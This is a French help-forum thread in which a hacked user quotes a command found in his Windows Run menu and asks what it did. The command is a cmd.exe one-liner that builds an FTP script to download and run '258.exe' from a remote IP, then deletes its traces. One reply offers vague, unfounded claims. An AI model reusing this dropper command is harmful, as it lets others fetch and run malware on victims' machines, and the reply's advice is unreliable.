Hacker en direct

Fermé
Syl20 - 15 nov. 2006 à 18:53
 mimimathi - 19 août 2009 à 18:51
Bonjour, je me suis fait pirater mon PC il y quelques jours et dans le menu exécuter il restait une trace je pense du passage de ce
"hacker" qui donne ceci :

cmd.exe /c del i&echo open xxx.xxx.xxx.xxx (IP) 7160 > i&echo user 1 1 >> i &echo get 258.exe >> i &echo quit >> i &ftp -n -s:i &258.exe&del i&exit

Je voudrais savoir si quelqu'un peut me traduire cette phrase et surtout m'expliquer quelles consèquences elle engendre sur mon pc. Car juste après l'attaque, le log de windows a été effacé (normal un bon hacker) et plusieur virus y ont trouvé refuge, dont le backdoor A et B. J'ai tout nettoyé avec mon logiciel BIT DEFENDER mais depuis j'ai une connexion qui rame. Est-ce que cela peut provenir de cette commande ?

Merci pour votre aide.

4 réponses

bonjour,
moi hackeur je peux t'affirmer ke ce message ne peut pas inffecter cette ordi si tu le supprime. Jusque ici je ne t apporte pas grand chose cepondant pour ta connexion internet c'est juste ke cet hackeur prend un peu de tes megabitts pour son ordi.............AUCUN MOYEN DE TE SAUVER juste le temps qu'il se lasse
5